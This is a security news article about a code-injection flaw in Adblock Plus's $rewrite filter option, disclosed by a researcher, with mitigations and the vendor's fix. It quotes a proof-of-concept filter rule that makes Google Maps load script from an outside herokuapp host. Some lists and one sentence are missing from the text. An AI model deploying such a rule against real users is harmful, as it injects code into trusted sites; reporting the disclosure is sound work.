Pierluigi Paganini
April 16, 2019
ad blocking extensions receive in input a list of malicious URLs that prevents the browser from connecting to them.
With the release of Adblocker Plus 3.2 in 2018, a new filter list option was implemented to allow a list maintainer to replace a web request. The option called $rewrite allows to replace an URL that matches a particular regular expression with another URL.
Security researcher Armin Sebastian discovered that under certain conditions it is possible to create a rule that injects a remote script into a target site.
“Under certain conditions the $rewrite filter option enables filter list maintainers to inject arbitrary code in web pages.” Armin wrote.
“The affected extensions have more than 100 million active users, and the feature is trivial to exploit in order to attack any sufficiently complex web service, including Google services, while attacks are difficult to detect and are deployable in all major browsers.”
The exploit is possible with the help of this filter option when they use XMLHttpRequest or Fetch to download code snippets for execution, while allowing requests to arbitrary origins and hosting a server-side open redirect.
Extensions periodically update filters at intervals determined by filter list operators. An attacker may set a short expiration time for the malicious filter list, and replace with a benign one shortly after the attack making it impossible to detect.
In order to use the exploit against a service, the following criteria must be met:
Armin Sebastian used Google Maps for his test:
/^https://www.google.com/maps/_/js/k=.*/m=pw/.*/rs=.*/$rewrite=/search?hl=en-US&source=hp&biw=&bih=&q=majestic-ramsons.herokuapp.com&btnI=I%27m+Feeling+Lucky&gbv=1
The above rule redirects users visiting Google Maps to Google’s I’m Feeling Lucky search service, that in turn redirects to a page
from https://majestic-ramsons.herokuapp[.]com/ with the payload: “alert(document.domain)”.
Below the procedure for running arbitrary code on Google Maps:
The expert reported the issue to Google, but they rejected it classifying the issue as an “Intended behavior”.
“Google has been notified about the exploit, but the report was closed as “Intended Behavior”, since they consider the potential security issue to be present solely in the mentioned browser extensions. This is an unfortunate conclusion, because the exploit is composed of a set of browser extension and web service vulnerabilities that have been chained together.” wrote the expert.
Armin Sebastian recommends that web sites utilize the Content Security Policy header and the connect-src option to specify a whitelist of sites that scripts can be loaded from.
The exploit can be mitigated in the affected web services by whitelisting known
Update April 16, 2019
Adblockplus is already working on eliminating any risk for its users.
“It is our responsibility to protect our users, and despite the actual risk being very low, we have decided to remove the rewrite option and will accordingly release an updated version of Adblock Plus as soon as technically possible.We are doing this as a measure of precaution. There has not been any attempt of abusing the rewrite option and we will do everything we can to ensure this won’t happen.” reads a statement published by adblockplus.org.
| [adrotate banner=”9″] | [adrotate banner=”12″] |
(SecurityAffairs – hacking, VSDC)
[adrotate banner=”5″]
[adrotate banner=”13″]
